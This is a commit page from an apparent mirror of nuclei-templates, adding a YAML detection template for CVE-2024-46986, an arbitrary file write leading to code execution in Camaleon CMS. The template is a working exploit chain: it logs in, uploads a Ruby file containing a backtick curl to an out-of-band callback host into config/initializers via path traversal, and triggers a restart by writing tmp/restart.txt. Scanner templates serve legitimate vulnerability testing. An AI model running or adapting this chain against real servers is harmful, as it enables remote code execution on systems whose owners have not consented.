daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2024-46986.yaml

patch-12
Dhiyaneshwaran 2024-09-26 14:32:18 +05:30 committed by GitHub
parent 96bfa01458
commit 4d20b7da49
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 124 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

124
http/cves/2024/CVE-2024-46986.yaml Normal file
View File

@ -0,0 +1,124 @@
id: CVE-2024-46986
info:
name: Camaleon CMS < 2.8.1 Arbitrary File Write to RCE
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application
reference:
- https://github.com/advisories/GHSA-wmjg-vqhv-q5p5
- https://codeql.github.com/codeql-query-help/ruby/rb-path-injection
- https://owasp.org/www-community/attacks/Path_Traversal
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.9
cve-id: CVE-2024-46986
cwe-id: CWE-22,CWE-74
epss-score: 0.0009
epss-percentile: 0.39015
cpe: cpe:2.3:a:tuzitio:camaleon_cms:*:*:*:*:*:*:*:*
metadata:
vendor: tuzitio
product: camaleon_cms
tags: cve,cve2024,camaleon,intrusive,rce,file-upload,authenticated
variables:
username: "{{username}}"
password: "{{password}}"
filename: "{{to_lower(rand_text_alpha(12))}}"
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /admin/login HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
internal: true
name: nonce
group: 1
regex:
- 'name="authenticity_token" value="(.*?)"'
- raw:
- |-
POST /admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
authenticity_token={{nonce}}&user%5Busername%5D={{username}}&user%5Bpassword%5D={{password}}
matchers:
- type: dsl
dsl:
- 'contains(location,"/admin/dashboard")'
internal: true
- raw:
- |
POST /admin/media/upload?actions=false HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="file_upload"; filename="{{filename}}.rb"
Content-Type: text/x-ruby-script
`curl {{interactsh-url}}`
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="folder"
../../../config/initializers/
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="skip_auto_crop"
true
------WebKitFormBoundarynJs8ffRP2MgQXiF8--
matchers:
- type: word
part: body
words:
- '{"name":"{{filename}}.rb","folder_path":"../../../config/initializers"'
internal: true
- raw:
- |
POST /admin/media/upload?actions=false HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="file_upload"; filename="restart.txt"
Content-Type: text/x-ruby-script
{{randstr}}
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="folder"
../../../tmp/
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="skip_auto_crop"
true
------WebKitFormBoundarynJs8ffRP2MgQXiF8--
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- dns
- type: word
part: body
words:
- '{"name":"restart.txt","folder_path":"../../../tmp"'